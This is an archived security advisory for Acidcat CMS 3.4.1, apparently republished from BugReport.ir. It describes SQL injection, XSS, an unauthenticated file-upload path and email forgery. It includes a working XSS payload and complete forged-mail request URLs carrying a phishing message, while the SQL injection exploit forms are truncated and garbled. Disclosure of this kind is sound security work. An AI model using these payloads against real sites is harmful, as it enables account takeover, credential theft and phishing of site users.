Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx2882.htm

Acidcat CMS Multiple Vulnerabilities



Acidcat CMS Multiple Vulnerabilities
Acidcat CMS Multiple Vulnerabilities



########################## www.BugReport.ir #######################################=0D 
#=0D
#      AmnPardaz Security Research Team=0D
#=0D
# Title: Acidcat CMS Multiple Vulnerabilities. =0D
# Vendor: www.acidcat.com=0D 
# Vulnerable Version: 3.4.1=0D
# Exploit: Available=0D
# Impact: High=0D
# Fix: N/A=0D
# Original Advisory: http://bugreport.ir/index.php?/36=0D 
###################################################################################=0D
=0D
=0D
####################=0D
1. Description:=0D
####################=0D
Acidcat CMS is a web site and simple Content Management System that can be administered via a web browser.=0D
=0D
####################=0D
2. Vulnerability:=0D
####################=0D
	2.1. There is a SQL Injection in "default.asp". By using it, attacker can gain usernames and encrypted passwords.=0D
		2.1.1. POC:=0D
				Check the exploit section.=0D
	2.2. There is a logical vulnerability in which attacker can send email by the site without any permission.=0D
		2.2.1. POC:=0D
				Check the exploit section.=0D
	2.3. There is a SQL Injection in "main_login2.asp". By using it, attacker can login to the site.=0D
		2.3.1. POC:=0D
				Check the exploit section.=0D
	2.4. There is a XSS in "/admin/admin_colors_swatch.asp".=0D
		2.4.1. POC:=0D
				/admin/admin_colors_swatch.asp?field=value='';}alert('XSS');function(){myForm.myText=0D
	2.5. There is a FckEditor which has no permission, and attacker can upload his/her file.=0D
		2.5.1. POC:=0D
				/admin/fckeditor/editor/filemanager/connectors/test.html=0D
####################=0D
3. Exploits:=0D
####################=0D
 =0D
Original Exploit URL: http://bugreport.ir/index.php?/36/exploit=0D 
=0D
	3.1. Attacker can gain usernames and passwords:=0D
	-------------=0D
action="http://[The URL]/default.asp?formType=&itemID=" method="post">=0D =0D
=0D =0D
=0D =0D -------------=0D 3.2. Attacker can send email without any permission:=0D -------------=0D default_mail_aspemail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D =0D default_mail_cdosys.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D =0D default_mail_jmail.asp? AcidcatSend=1&From=Fake@Site.com&FromName=FakeAdmin&To=Victim@Email.com&Subject=Forgery&Body=Change your password to 123456!=0D -------------=0D 3.3. Attacker can login to the site:=0D -------------=0D
=0D =0D
=0D =0D
=0D =0D
=0D -------------=0D ####################=0D 4. Solution:=0D ####################=0D Edit the source code to ensure that inputs are properly sanitized.=0D ####################=0D - Credit :=0D ####################=0D AmnPardaz Security Research & Penetration Testing Group=0D Contact: admin[4t}bugreport{d0t]ir=0D WwW.BugReport.ir=0D WwW.AmnPardaz.com=0D


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH